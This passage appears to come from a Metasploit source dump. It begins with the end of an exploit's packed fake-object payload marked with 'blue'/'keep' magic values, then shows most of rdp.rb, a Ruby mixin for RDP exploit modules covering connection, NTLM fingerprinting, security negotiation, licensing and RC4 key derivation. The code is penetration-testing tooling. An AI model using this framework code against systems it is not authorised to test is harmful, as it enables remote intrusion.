1108 |         magic_value1, # connChannelsAddr (POINTER, 8 bytes)
1109 |         magic_value1, # list1 (QWORD, 8 bytes)
1110 |         magic_value1, # list1 (QWORD, 8 bytes)
1111 |         magic_value1, # list2 (QWORD, 8 bytes)
1112 |         magic_value1, # list2 (QWORD, 8 bytes)
1113 |         0x65756c62, # inputBufferLen (DWORD, 4 bytes)
1114 |         0x7065656b, # inputBufferLen (DWORD, 4 bytes)
1115 |         magic_value1, # connResrouce (QWORD, 8 bytes)
1116 |         0x65756c62, # lockCount158 (DWORD, 4 bytes)
1117 |         0x7065656b, # dword15C (DWORD, 4 bytes)
1118 |       ].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L')
1119 |     ].join('')
1120 |   end
1121 | 
1122 | end
1123 | 


--------------------------------------------------------------------------------
/rdp.rb:
--------------------------------------------------------------------------------
   1 | # -*- coding: binary -*-
   2 | 
   3 | module Msf
   4 | 
   5 | ###
   6 | #
   7 | # This module exposes methods for interacting with a remote RDP service
   8 | #
   9 | ###
  10 | module Exploit::Remote::RDP
  11 |   require 'rc4'
  12 |   include Msf::Exploit::Remote::Tcp
  13 | 
  14 |   #
  15 |   # Creates an instance of a RDP exploit module.
  16 |   #
  17 |   def initialize(info = {})
  18 |     super
  19 |     register_options(
  20 |       [
  21 |         OptString.new('RDP_USER', [ false, 'The username to report during connect, UNSET = random']),
  22 |         OptString.new('RDP_CLIENT_NAME', [ false, 'The client computer name to report during connect, UNSET = random', 'rdesktop']),
  23 |         OptString.new('RDP_DOMAIN', [ false, 'The client domain name to report during connect']),
  24 |         OptAddress.new('RDP_CLIENT_IP', [ true, 'The client IPv4 address to report during connect', '192.168.0.100']),
  25 |         Opt::RPORT(3389)
  26 |       ], Msf::Exploit::Remote::RDP)
  27 |       register_advanced_options(
  28 |       [
  29 |         OptInt.new('RDP_TLS_SECURITY_LEVEL', [ true, 'Change default TLS security level. "0" (default) means everything is permitted. "1" rejects very weak parameters and "2" is even stricter.', 0 ])
  30 |       ], Msf::Exploit::Remote::RDP)
  31 |   end
  32 | 
  33 | 
  34 |   # used to abruptly abort scanner for a given host
  35 |   class RdpCommunicationError < StandardError
  36 |   end
  37 | 
  38 |   #
  39 |   # Constants
  40 |   #
  41 |   class RDPConstants
  42 |     SSL_REQUIRED_BY_SERVER = 1
  43 |     SSL_NOT_ALLOWED_BY_SERVER = 2
  44 |     SSL_CERT_NOT_ON_SERVER = 3
  45 |     INCONSISTENT_FLAGS = 4
  46 |     HYBRID_REQUIRED_BY_SERVER = 5
  47 |     SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER = 6
  48 | 
  49 |     PROTOCOL_RDP = 0
  50 |     PROTOCOL_SSL = 1
  51 |     PROTOCOL_HYBRID = 2
  52 |     PROTOCOL_RDSTLS = 4
  53 |     PROTOCOL_HYBRID_EX = 8
  54 | 
  55 |     RDP_NEG_PROTOCOL = {
  56 |       0 => "PROTOCOL_RDP",
  57 |       1 => "PROTOCOL_SSL",
  58 |       2 => "PROTOCOL_HYBRID",
  59 |       4 => "PROTOCOL_RDSTLS",
  60 |       8 => "PROTOCOL_HYBRID_EX"
  61 |     }
  62 | 
  63 |     RDP_NEG_FAILURE = {
  64 |       1 => "SSL_REQUIRED_BY_SERVER",
  65 |       2 => "SSL_NOT_ALLOWED_BY_SERVER",
  66 |       3 => "SSL_CERT_NOT_ON_SERVER",
  67 |       4 => "INCONSISTENT_FLAGS",
  68 |       5 => "HYBRID_REQUIRED_BY_SERVER",
  69 |       6 => "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"
  70 |     }
  71 | 
  72 |     REDIRECTION_SUPPORTED = 0x1
  73 |     REDIRECTION_VERSION3  = 0x2 << 2
  74 |     REDIRECTION_VERSION4  = 0x3 << 2
  75 |     REDIRECTION_VERSION5  = 0x4 << 2
  76 | 
  77 |     ENCRYPTION_40BIT  = 0x01
  78 |     ENCRYPTION_128BIT = 0x02
  79 |     ENCRYPTION_56BIT  = 0x08
  80 |     ENCRYPTION_FIPS   = 0x10
  81 | 
  82 |     LICENSE_REQUEST            = 0x01
  83 |     LICENSE_PLATFORM_CHALLENGE = 0x02
  84 |     LICENSE_NEW_LICENSE        = 0x03
  85 |     LICENSE_UPGRADE_LICENSE    = 0x04
  86 |     LICENSE_LICENSE_INFO       = 0x12
  87 |     LICENSE_NEW_LICENSE_REQ    = 0x13
  88 |     LICENSE_PLATFORM_CHAL_RESP = 0x15
  89 |     LICENSE_ERROR_ALERT        = 0xff
  90 | 
  91 |     LICENSE_TAGS = {
  92 |       0x01 => "LICENSE_REQUEST",
  93 |       0x02 => "LICENSE_PLATFORM_CHALLENGE",
  94 |       0x03 => "LICENSE_NEW_LICENSE",
  95 |       0x04 => "LICENSE_UPGRADE_LICENSE",
  96 |       0x12 => "LICENSE_LICENSE_INFO",
  97 |       0x13 => "LICENSE_NEW_LICENSE_REQ",
  98 |       0x15 => "LICENSE_PLATFORM_CHAL_RESP",
  99 |       0xff => "LICENSE_ERROR_ALERT"
 100 |     }
 101 | 
 102 |     LICENSE_ERR_INVALID_SCOPE     = 0x04
 103 |     LICENSE_ERR_NO_LICENSE_SERVER = 0x06
 104 |     LICENSE_ERR_LICENSE_ISSUED    = 0x07
 105 |     LICENSE_ERR_INVALID_CLIENT    = 0x08
 106 |     LICENSE_ERR_INVALID_PRODUCTID = 0x0b
 107 |     LICENSE_ERR_INVALID_MSG_LEN   = 0x0c
 108 | 
 109 |     LICENSE_ERRS = {
 110 |       0x04 => "INVALID_SCOPE",
 111 |       0x06 => "NO_LICENSE_SERVER",
 112 |       0x07 => "LICENSE_ISSUED",
 113 |       0x08 => "INVALID_CLIENT",
 114 |       0x0b => "INVALID_PRODUCTID",
 115 |       0x0c => "INVALID_MSG_LEN"
 116 |     }
 117 | 
 118 |     CHAN_INITIALIZED               = 0x80000000
 119 |     CHAN_ENCRYPT_RDP               = 0x40000000
 120 |     CHAN_ENCRYPT_SC                = 0x20000000
 121 |     CHAN_ENCRYPT_CS                = 0x10000000
 122 |     CHAN_PRI_HIGH                  = 0x08000000
 123 |     CHAN_PRI_MED                   = 0x04000000
 124 |     CHAN_PRI_LOW                   = 0x02000000
 125 |     CHAN_COMPRESS_RDP              = 0x00800000
 126 |     CHAN_COMPRESS                  = 0x00400000
 127 |     CHAN_SHOW_PROTOCOL             = 0x00200000
 128 |     CHAN_REMOTE_CONTROL_PERSISTENT = 0x00100000
 129 | 
 130 |     CHAN_FLAG_FIRST         = 0x01
 131 |     CHAN_FLAG_LAST          = 0x02
 132 |     CHAN_FLAG_SHOW_PROTOCOL = 0x10
 133 | 
 134 |     RDPDR_CTYP_CORE = 0x4472
 135 | 
 136 |     PAKID_CORE_SERVER_ANNOUNCE     = 0x496e
 137 |     PAKID_CORE_SERVER_CAPABILITY   = 0x5350
 138 |     PAKID_CORE_CLIENTID_CONFIRM    = 0x4343
 139 |     PAKID_CORE_CLIENT_NAME         = 0x434e
 140 |     PAKID_CORE_DEVICELIST_ANNOUNCE = 0x4441
 141 |   end
 142 | 
 143 |   def rdp_connect
 144 |     self.rdp_sock = connect(false)
 145 |     self.rdp_sock.setsockopt(::Socket::IPPROTO_TCP, ::Socket::TCP_NODELAY, 1)
 146 |   end
 147 | 
 148 |   def rdp_disconnect
 149 |     disconnect(self.rdp_sock)
 150 |     self.rdp_sock = nil
 151 |   end
 152 | 
 153 |   def rdp_send(data)
 154 |     self.rdp_sock.put(data)
 155 |   end
 156 | 
 157 |   def rdp_recv(length = -1, timeout = 5)
 158 |     res = self.rdp_sock.get_once(length, timeout)
 159 |     raise RdpCommunicationError unless res # nil due to a timeout
 160 | 
 161 |     res
 162 |   rescue EOFError
 163 |     raise RdpCommunicationError
 164 |   end
 165 | 
 166 |   def rdp_send_recv(data)
 167 |     rdp_send(data)
 168 |     rdp_recv
 169 |   end
 170 | 
 171 |   # Connect and perform fingerprinting of the RDP service
 172 |   #
 173 |   # Note: NLA is required to detect the product_version
 174 |   #
 175 |   # @return [Boolean] Is service RDP
 176 |   # @return [Hash] Version information
 177 |   def rdp_fingerprint
 178 |     peer_info = {}
 179 |     # warning: if rdp_check_protocol starts handling NLA, this will need to be updated
 180 |     is_rdp, server_selected_proto = rdp_check_protocol(RDPConstants::PROTOCOL_SSL | RDPConstants::PROTOCOL_HYBRID | RDPConstants::PROTOCOL_HYBRID_EX)
 181 |     return false, nil unless is_rdp
 182 |     return true, peer_info unless [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto
 183 | 
 184 |     swap_sock_plain_to_ssl
 185 |     ntlm_negotiate_blob = ''  # see: https://fadedlab.wordpress.com/2019/06/13/using-nmap-to-extract-windows-info-from-rdp/
 186 |     ntlm_negotiate_blob << "\x30\x37\xa0\x03\x02\x01\x60\xa1\x30\x30\x2e\x30\x2c\xa0\x2a\x04\x28"
 187 |     ntlm_negotiate_blob << "\x4e\x54\x4c\x4d\x53\x53\x50\x00"  #  Identifier - NTLMSSP
 188 |     ntlm_negotiate_blob << "\x01\x00\x00\x00"                  #  Type: NTLMSSP Negotiate - 01
 189 |     ntlm_negotiate_blob << "\xb7\x82\x08\xe2"                  #  Flags (NEGOTIATE_SIGN_ALWAYS | NEGOTIATE_NTLM | NEGOTIATE_SIGN | REQUEST_TARGET | NEGOTIATE_UNICODE)
 190 |     ntlm_negotiate_blob << "\x00\x00"                          #  DomainNameLen
 191 |     ntlm_negotiate_blob << "\x00\x00"                          #  DomainNameMaxLen
 192 |     ntlm_negotiate_blob << "\x00\x00\x00\x00"                  #  DomainNameBufferOffset
 193 |     ntlm_negotiate_blob << "\x00\x00"                          #  WorkstationLen
 194 |     ntlm_negotiate_blob << "\x00\x00"                          #  WorkstationMaxLen
 195 |     ntlm_negotiate_blob << "\x00\x00\x00\x00"                  #  WorkstationBufferOffset
 196 |     ntlm_negotiate_blob << "\x0a"                              #  ProductMajorVersion = 10
 197 |     ntlm_negotiate_blob << "\x00"                              #  ProductMinorVersion = 0
 198 |     ntlm_negotiate_blob << "\x63\x45"                          #  ProductBuild = 0x4563 = 17763
 199 |     ntlm_negotiate_blob << "\x00\x00\x00"                      #  Reserved
 200 |     ntlm_negotiate_blob << "\x0f"                              #  NTLMRevision = 5 = NTLMSSP_REVISION_W2K3
 201 |     resp = rdp_send_recv(ntlm_negotiate_blob)
 202 | 
 203 |     ntlmssp_start = resp.index('NTLMSSP')
 204 |     if ntlmssp_start
 205 |       ntlmssp = NTLM_MESSAGE::parse(resp[ntlmssp_start..-1])
 206 |       version = ntlmssp.padding.bytes
 207 |       peer_info[:product_version] = "#{version[0]}.#{version[1]}.#{version[2] | (version[3] << 8)}"
 208 |     end
 209 | 
 210 |     return is_rdp, peer_info
 211 |   end
 212 | 
 213 |   def rdp_dispatch_loop
 214 |     while rdp_sock do
 215 |       rdp_handle_packet(rdp_recv)
 216 |     end
 217 |   end
 218 | 
 219 |   def rdp_create_channel_msg(chan_user_id, chan_id, data, flags = 3, data_length = nil)
 220 |     data_length ||= data.length
 221 | 
 222 |     pdu = [
 223 |       [25 << 2].pack('C'), # MCS send data request structure, choice 25
 224 |       [self.rdp_user_id, chan_id].pack('S>S>'), # MCS send data request structure, choice 25
 225 |       "\x70", # Wut (security header)
 226 |       per_data(
 227 |         [data_length].pack('<L'),
 228 |         [flags].pack('<L'),
 229 |         data
 230 |       )
 231 |     ].join('')
 232 | 
 233 |     build_data_tpdu(pdu)
 234 |   end
 235 | 
 236 |   def rdp_send_channel(chan_user_id, chan_id, data, flags = 3, data_length = nil)
 237 |     tpkt = rdp_create_channel_msg(chan_user_id, chan_id, data, flags, data_length)
 238 |     rdp_send(tpkt)
 239 |   end
 240 | 
 241 |   def rdp_terminate
 242 |     body = "\x21\x80" # user requested disconnect provider ultimatum
 243 | 
 244 |     rdp_send(build_data_tpdu(body))
 245 |   end
 246 | 
 247 |   # Connect and detect security protocol
 248 |   #
 249 |   # Note: NLA is detected but not supported yet
 250 |   #
 251 |   # @return [Boolean] Is service RDP
 252 |   # @return [RDPConstants] Protocol supported
 253 |   def rdp_check_protocol(req_proto = RDPConstants::PROTOCOL_SSL)
 254 |     if datastore['RDP_USER']
 255 |       @user_name = datastore['RDP_USER']
 256 |     else
 257 |       @user_name = Rex::Text.rand_text_alpha(7)
 258 |     end
 259 | 
 260 |     if datastore['RDP_DOMAIN']
 261 |       @domain = datastore['RDP_DOMAIN']
 262 |     else
 263 |       @domain = Rex::Text.rand_text_alpha(7)
 264 |     end
 265 | 
 266 |     if datastore['RDP_CLIENT_NAME']
 267 |       @computer_name = datastore['RDP_CLIENT_NAME']
 268 |     else
 269 |       @computer_name = Rex::Text.rand_text_alpha(15)
 270 |     end
 271 | 
 272 |     @ip_address = datastore['RDP_CLIENT_IP']
 273 | 
 274 |     # code to check if RDP is open or not
 275 |     vprint_status("Verifying RDP protocol...")
 276 | 
 277 |     vprint_status("Attempting to connect using TLS security")
 278 |     res = rdp_send_recv(pdu_negotiation_request(@user_name, req_proto))
 279 | 
 280 |     # return true if the response is a X.224 Connect Confirm
 281 |     # We can't use a check for RDP Negotiation Response because WinXP excludes it
 282 |     if res
 283 |       result, err_msg = rdp_parse_negotiation_response(res)
 284 |       return true, result if result
 285 | 
 286 |       # No current support for NLA, nothing to do here
 287 |       return true, RDPConstants::PROTOCOL_HYBRID if err_msg == 'HYBRID_REQUIRED_BY_SERVER'
 288 | 
 289 |       if err_msg == "Negotiation Response packet too short."
 290 |         vprint_status("Attempt to connect with TLS failed but looks like the target is Windows XP")
 291 |       else
 292 |         vprint_status("Attempt to connect with TLS failed with error: #{err_msg}")
 293 |       end
 294 | 
 295 |       if ["SSL_NOT_ALLOWED_BY_SERVER", "Negotiation Response packet too short."].include? err_msg
 296 |         # This happens if the server is configured to ONLY permit RDP Security
 297 |         vprint_status("Attempting to connect using Standard RDP security")
 298 |         rdp_disconnect
 299 |         rdp_connect
 300 |         res = rdp_send_recv(pdu_negotiation_request(@user_name, RDPConstants::PROTOCOL_RDP))
 301 | 
 302 |         if res
 303 |           result, err_msg = rdp_parse_negotiation_response(res)
 304 |           return true, result if result
 305 | 
 306 |           # Windows XP doesn't return the standard Negotiation Response packet
 307 |           # but we at least know this was RDP since the packet contained a
 308 |           # Connect-Confirm response (0xd0).
 309 |           if err_msg == "Negotiation Response packet too short."
 310 |             return true, RDPConstants::PROTOCOL_RDP
 311 |           end
 312 | 
 313 |           vprint_status("Attempt to connect with Standard RDP failed with error #{err_msg}")
 314 |         end
 315 |       end
 316 |     end
 317 | 
 318 |     return false, 0
 319 |   end
 320 | 
 321 |   # Negotiate security protocol and begin session building
 322 |   #
 323 |   # @return [Boolean] success
 324 |   def rdp_negotiate_security(channels, req_proto = RDPConstants::PROTOCOL_SSL)
 325 |     if req_proto == RDPConstants::PROTOCOL_SSL
 326 |       swap_sock_plain_to_ssl
 327 |       res = rdp_send_recv(pdu_connect_initial(channels, req_proto, @computer_name))
 328 |     elsif req_proto == RDPConstants::PROTOCOL_RDP
 329 |       res = rdp_send_recv(pdu_connect_initial(channels, req_proto, @computer_name))
 330 |       rsmod, rsexp, _rsran, server_rand, bitlen = rdp_parse_connect_response(res)
 331 |     elsif [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(req_proto)
 332 |       vprint_status("NLA Security protocol unsupported at this time.")
 333 |       return false
 334 |     else
 335 |       vprint_error("Unknown protocol requested (#{req_proto}).")
 336 |       return false
 337 |     end
 338 | 
 339 |     # erect domain and attach user
 340 |     vprint_status("Sending erect domain request")
 341 |     rdp_send(pdu_erect_domain_request)
 342 |     res = rdp_send_recv(pdu_attach_user_request)
 343 | 
 344 |     self.rdp_user_id = res[9, 2].unpack("n").first
 345 | 
 346 |     # send channel requests
 347 |     [1009, 1003, 1004, 1005, 1006, 1007, 1008].each do |chan|
 348 |       rdp_send_recv(pdu_channel_join_request(self.rdp_user_id, chan))
 349 |     end
 350 | 
 351 |     if req_proto == RDPConstants::PROTOCOL_RDP
 352 |       @rdp_sec = true
 353 | 
 354 |       # 5.3.4 Client Random Value
 355 |       client_rand = ''
 356 |       32.times { client_rand << rand(0..255) }
 357 |       rcran = bytes_to_bignum(client_rand)
 358 | 
 359 |       vprint_status("Sending security exchange PDU")
 360 |       rdp_send(pdu_security_exchange(rcran, rsexp, rsmod, bitlen))
 361 | 
 362 |       # We aren't decrypting anything at this point. Leave the variables here
 363 |       # to make it easier to understand in the future.
 364 |       rc4encstart, _rc4decstart, @hmackey, _sessblob = rdp_calculate_rc4_keys(client_rand, server_rand)
 365 | 
 366 |       @rc4enckey = RC4.new(rc4encstart)
 367 |     end
 368 | 
 369 |     return true
 370 |   end
 371 | 
 372 |   def rdp_generate_license_keys(data)
 373 |     client_random = ''
 374 |     32.times { client_random << rand(0..255) }
 375 |     premaster_secret = ''
 376 |     32.times { premaster_secret << rand(0..255) }
 377 |     server_random = data[0..31]
 378 | 
 379 |     master_secret = rdp_salted_hash48(premaster_secret, "A", client_random, server_random)
 380 |     key_block = rdp_salted_hash48(master_secret, "A", client_random, server_random)
 381 | 
 382 |     license_sign_key = key_block[0..15]
 383 |     license_key = rdp_salted_hash16(key_block[16..31], client_random, server_random)
 384 | 
 385 |     return client_random, license_key, license_sign_key
 386 |   end
 387 | 
 388 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpele/e17772e9-9642-4bb6-a2bc-82875dd6da7c
 389 |   # Server License Request - 2.2.2.1
 390 |   def rdp_handle_license_request(data)
 391 |     # Note: license_key is currently unused
 392 |     client_random, license_key, license_sign_key = rdp_generate_license_keys(data)
 393 | 
 394 |     # We're not really decrypting the license from the server, but it should be good enough
 395 |     vprint_status("Sending new license request PDU")
 396 |     new_license_request = pdu_new_license_request(client_random, @user_name, @computer_name)
 397 |     pkt = rdp_build_pkt(new_license_request, license_info: true)
 398 | 
 399 |     # Expect that we are issued a license here
 400 |     res = rdp_send_recv(pkt)
 401 |     rdp_parse_license_pdu(res)
 402 |   end
 403 | 
 404 |   def rdp_handle_license_error_alert(data)
 405 |     error_code, state_transition, error_info = data[0..11].unpack("VVV")
 406 |     vprint_status("License error/alert code 0x#{error_code.to_s(16)} (#{RDPConstants::LICENSE_ERRS[error_code]})")
 407 |     # Ensure that we were issued a license by the server
 408 |     raise RdpCommunicationError if error_code != RDPConstants::LICENSE_ERR_LICENSE_ISSUED
 409 |   end
 410 | 
 411 |   def rdp_parse_license_pdu(data)
 412 |     raise RdpCommunicationError if data.length < 20
 413 |     rdp_version = data[0].unpack("C")[0]
 414 |     raise RdpCommunicationError if rdp_version != 3
 415 |     length = data[2..3].unpack("n")[0]
 416 |     raise RdpCommunicationError if data.length != length
 417 | 
 418 |     data_len = data[13].unpack("C")[0]
 419 |     tag_offset = 18
 420 |     tag_offset += 1 if (data_len & 0x80 == 0x80) # 2 byte length
 421 | 
 422 |     tag = data[tag_offset].unpack("C")[0]
 423 |     vprint_status("Got license packet type 0x#{tag.to_s(16)} (#{RDPConstants::LICENSE_TAGS[tag]})")
 424 | 
 425 |     case tag
 426 |       when RDPConstants::LICENSE_REQUEST
 427 |         rdp_handle_license_request(data[tag_offset + 4..-1])
 428 |       when RDPConstants::LICENSE_PLATFORM_CHALLENGE
 429 |       when RDPConstants::LICENSE_NEW_LICENSE
 430 |       when RDPConstants::LICENSE_UPGRADE_LICENSE
 431 |       when RDPConstants::LICENSE_LICENSE_INFO
 432 |       when RDPConstants::LICENSE_NEW_LICENSE_REQ
 433 |       when RDPConstants::LICENSE_PLATFORM_CHAL_RESP
 434 |       when RDPConstants::LICENSE_ERROR_ALERT
 435 |         rdp_handle_license_error_alert(data[tag_offset + 4..-1])
 436 |     end
 437 |   end
 438 | 
 439 |   # Finish building session after all security is negotiated
 440 |   def rdp_establish_session
 441 |     vprint_status("Sending client info PDU")
 442 |     res = rdp_send_recv(rdp_build_pkt(pdu_client_info(@user_name, @domain, @ip_address),
 443 |                                       "\x03\xeb", client_info: true))
 444 |     vprint_status("Received License packet (#{res.length} bytes)")
 445 |     rdp_parse_license_pdu(res)
 446 | 
 447 |     # Windows XP sometimes sends a very large license packet. This is likely
 448 |     # some form of license error. When it does this it doesn't send a Server
 449 |     # Demand packet. If we wait on one we will time out here and error. We
 450 |     # can still successfully check for vulnerability anyway.
 451 |     if res.length <= 34
 452 |       vprint_status("Waiting for Server Demand packet")
 453 |       _res = rdp_recv
 454 |       vprint_status("Received Server Demand packet")
 455 |     end
 456 | 
 457 |     vprint_status("Sending client confirm active PDU")
 458 |     rdp_send(rdp_build_pkt(pdu_client_confirm_active))
 459 | 
 460 |     vprint_status("Sending client synchronize PDU")
 461 |     vprint_status("Sending client control cooperate PDU")
 462 |     # Unsure why we're using 1009 here but it works.
 463 |     synch = rdp_build_pkt(pdu_client_synchronize(1009))
 464 |     coop = rdp_build_pkt(pdu_client_control_cooperate)
 465 |     rdp_send(synch + coop)
 466 | 
 467 |     vprint_status("Sending client control request control PDU")
 468 |     rdp_send(rdp_build_pkt(pdu_client_control_request))
 469 | 
 470 |     vprint_status("Sending client input sychronize PDU")
 471 |     rdp_send(rdp_build_pkt(pdu_client_input_event_sychronize))
 472 | 
 473 |     vprint_status("Sending client font list PDU")
 474 |     rdp_send(rdp_build_pkt(pdu_client_font_list))
 475 |   end
 476 | 
 477 |   #
 478 |   # Protocol parsers
 479 |   #
 480 | 
 481 |   # Parse RDP Negotiation Data - 2.2.1.2
 482 |   # Reference: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/13757f8f-66db-4273-9d2c-385c33b1e483
 483 |   # @return [String, nil] String representation of the Selected Protocol or nil on failure
 484 |   # @return [String] Error message
 485 |   def rdp_parse_negotiation_response(data)
 486 |     return false, "Response is not an RDP Negotiation Response packet." unless data.match("\x03\x00\x00..\xd0")
 487 |     return false, "Negotiation Response packet too short." if data.length < 19
 488 | 
 489 |     response_code = data[11].unpack("C")[0]
 490 | 
 491 |     if response_code == 2  # TYPE_RDP_NEG_RSP
 492 |       # RDP Negotiation Response - 2.2.1.2.1
 493 |       server_selected_proto = data[15..18].unpack("L<")[0]
 494 | 
 495 |       proto_label = RDPConstants::RDP_NEG_PROTOCOL[server_selected_proto]
 496 |       return server_selected_proto, nil if proto_label
 497 | 
 498 |       return nil, "Unknown protocol in Negotiation Response: #{server_selected_proto}"
 499 | 
 500 |     elsif response_code == 3  # TYPE_RDP_NEG_FAILURE
 501 |       # RDP Negotiation Failure - 2.2.1.2.2
 502 |       failure_code = data[15..18].unpack("L<")[0]
 503 |       return nil, RDPConstants::RDP_NEG_FAILURE[failure_code]
 504 |     else
 505 |       return nil, "Unknown Negotiation Response code: #{response_code}"
 506 |     end
 507 |   end
 508 | 
 509 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/927de44c-7fe8-4206-a14f-e5517dc24b1c
 510 |   # Parse Server MCS Connect Response PUD - 2.2.1.4
 511 |   def rdp_parse_connect_response(pkt)
 512 |     ptr = 0
 513 |     rdp_pkt = pkt[0x49..pkt.length]
 514 | 
 515 |     while ptr < rdp_pkt.length
 516 |       header_type = rdp_pkt[ptr..ptr + 1]
 517 |       header_length = rdp_pkt[ptr + 2..ptr + 3].unpack("S<")[0]
 518 | 
 519 |       if header_type == "\x02\x0c"
 520 | 
 521 |         server_random = rdp_pkt[ptr + 20..ptr + 51]
 522 |         public_exponent = rdp_pkt[ptr + 84..ptr + 87]
 523 | 
 524 |         rsa_magic = rdp_pkt[ptr + 68..ptr + 71]
 525 |         if rsa_magic != "RSA1"
 526 |           print_error("Server cert isn't RSA, this scenario isn't supported (yet).")
 527 |           raise RdpCommunicationError
 528 |         end
 529 | 
 530 |         bitlen = rdp_pkt[ptr + 72..ptr + 75].unpack("L<")[0] - 8
 531 |         modulus = rdp_pkt[ptr + 88..ptr + 87 + bitlen]
 532 |       end
 533 | 
 534 |       ptr += header_length
 535 |     end
 536 | 
 537 |     # vprint_status("SERVER_MODULUS: #{bin_to_hex(modulus)}")
 538 |     # vprint_status("SERVER_EXPONENT: #{bin_to_hex(public_exponent)}")
 539 |     # vprint_status("SERVER_RANDOM: #{bin_to_hex(server_random)}")
 540 | 
 541 |     rsmod = bytes_to_bignum(modulus)
 542 |     rsexp = bytes_to_bignum(public_exponent)
 543 |     rsran = bytes_to_bignum(server_random)
 544 | 
 545 |     # vprint_status("MODULUS  = #{bin_to_hex(modulus)} - #{rsmod.to_s}")
 546 |     # vprint_status("EXPONENT = #{bin_to_hex(public_exponent)} - #{rsexp.to_s}")
 547 |     # vprint_status("SVRANDOM = #{bin_to_hex(server_random)} - #{rsran.to_s}")
 548 | 
 549 |     return rsmod, rsexp, rsran, server_random, bitlen
 550 |   end
 551 | 
 552 |   #
 553 |   # Encryption: Standard RDP Security
 554 |   #
 555 | 
 556 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/7c61b54e-f6cd-4819-a59a-daf200f6bf94
 557 |   # mac_salt_key = "W\x13\xc58\x7f\xeb\xa9\x10*\x1e\xddV\x96\x8b[d"
 558 |   # data_content = "\x12\x00\x17\x00\xef\x03\xea\x03\x02\x00\x00\x01\x04\x00$\x00\x00\x00"
 559 |   # hmac = rdp_hmac(mac_salt_key, data_content) # == hexlified: "22d5aeb486994a0c785dc929a2855923"
 560 |   def rdp_hmac(mac_salt_key, data_content)
 561 |     sha1 = Digest::SHA1.new
 562 |     md5 = Digest::MD5.new
 563 | 
 564 |     pad1 = "\x36" * 40
 565 |     pad2 = "\x5c" * 48
 566 | 
 567 |     sha1 << mac_salt_key
 568 |     sha1 << pad1
 569 |     sha1 << [data_content.length].pack('<L')
 570 |     sha1 << data_content
 571 | 
 572 |     md5 << mac_salt_key
 573 |     md5 << pad2
 574 |     md5 << [sha1.hexdigest].pack("H*")
 575 | 
 576 |     [md5.hexdigest].pack("H*")
 577 |   end
 578 | 
 579 |   def rdp_salted_hash16(s_bytes, salt1, salt2)
 580 |     md5 = Digest::MD5.new
 581 | 
 582 |     md5 << s_bytes[0..15]
 583 |     md5 << salt1[0..31]
 584 |     md5 << salt2[0..31]
 585 | 
 586 |     [md5.hexdigest].pack("H*")
 587 |   end
 588 | 
 589 |   # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/705f9542-b0e3-48be-b9a5-cf2ee582607f
 590 |   #  SaltedHash(S, I) = MD5(S + SHA(I + S + ClientRandom + ServerRandom))
 591 |   def rdp_salted_hash(s_bytes, i_bytes, client_random_bytes, server_random_bytes)
 592 |     sha1 = Digest::SHA1.new
 593 |     md5 = Digest::MD5.new
 594 | 
 595 |     sha1 << i_bytes
 596 |     sha1 << s_bytes
 597 |     sha1 << client_random_bytes
 598 |     sha1 << server_random_bytes
 599 | 
 600 |     md5 << s_bytes
 601 |     md5 << [sha1.hexdigest].pack("H*")
 602 | 
 603 |     [md5.hexdigest].pack("H*")
 604 |   end
 605 | 
 606 |   def rdp_salted_hash48(s_bytes, i_byte, client_random, server_random)
 607 |     rdp_salted_hash(s_bytes, i_byte, client_random, server_random) + \
 608 |       rdp_salted_hash(s_bytes, (i_byte.ord + 1).chr * 2, client_random, server_random) + \
 609 |       rdp_salted_hash(s_bytes, (i_byte.ord + 2).chr * 3, client_random, server_random)
 610 |   end
 611 | 
 612 |   #  FinalHash(K) = MD5(K + ClientRandom + ServerRandom)
 613 |   def rdp_final_hash(k, client_random_bytes, server_random_bytes)
 614 |     md5 = Digest::MD5.new
 615 | 
 616 |     md5 << k
 617 |     md5 << client_random_bytes
 618 |     md5 << server_random_bytes
 619 | 
 620 |     [md5.hexdigest].pack("H*")
 621 |   end
 622 | 
 623 |   def rdp_calculate_rc4_keys(client_random, server_random)
 624 |     # g = First192Bits(ClientRandom) + First192Bits(ServerRandom)
 625 |     g = client_random[0..23] + server_random[0..23]
 626 | 
 627 |     # PreMasterHash(I) = SaltedHash(g, I)
 628 |     # MasterSecret = PreMasterHash(0x41) + PreMasterHash(0x4242) + PreMasterHash(0x434343)
 629 |     master_secret = rdp_salted_hash48(g, "A", client_random, server_random)
 630 | 
 631 |     # MasterHash(I) = SaltedHash(MasterSecret, I)
 632 |     # SessionKeyBlob = MasterHash(0x58) + MasterHash(0x5959) + MasterHash(0x5A5A5A)
 633 |     sessionKeyBlob = rdp_salted_hash48(master_secret, "X", client_random, server_random)
 634 | 
 635 |     # InitialClientDecryptKey128 = FinalHash(Second128Bits(SessionKeyBlob))
 636 |     initialClientDecryptKey128 = rdp_final_hash(sessionKeyBlob[16..31], client_random, server_random)
 637 | 
 638 |     # InitialClientEncryptKey128 = FinalHash(Third128Bits(SessionKeyBlob))
 639 |     initialClientEncryptKey128 = rdp_final_hash(sessionKeyBlob[32..47], client_random, server_random)
 640 | 
 641 |     mac_key = sessionKeyBlob[0..15]
 642 | 
 643 |     return initialClientEncryptKey128, initialClientDecryptKey128, mac_key, sessionKeyBlob
 644 |   end
 645 | 
 646 |   def rsa_encrypt(bignum, rsexp, rsmod)
 647 |     (bignum ** rsexp) % rsmod
 648 |   end
 649 | 
 650 |   def rdp_rc4_crypt(rc4obj, data)
 651 |     rc4obj.encrypt(data)
 652 |   end
 653 | 
 654 |   def bytes_to_bignum(bytes_val, order = "little")
 655 |     bytes = bin_to_hex(bytes_val)
 656 |     if order == "little"
 657 |       bytes = bytes.scan(/../).reverse.join('')
 658 |     end
 659 |     s = "0x" + bytes
 660 |     s.to_i(16)
 661 |   end
 662 | 
 663 |   # https://www.ruby-forum.com/t/integer-to-byte-string-speed-improvements/67110
 664 |   def int_to_bytestring( int_val, num_chars = nil )
 665 |     unless num_chars
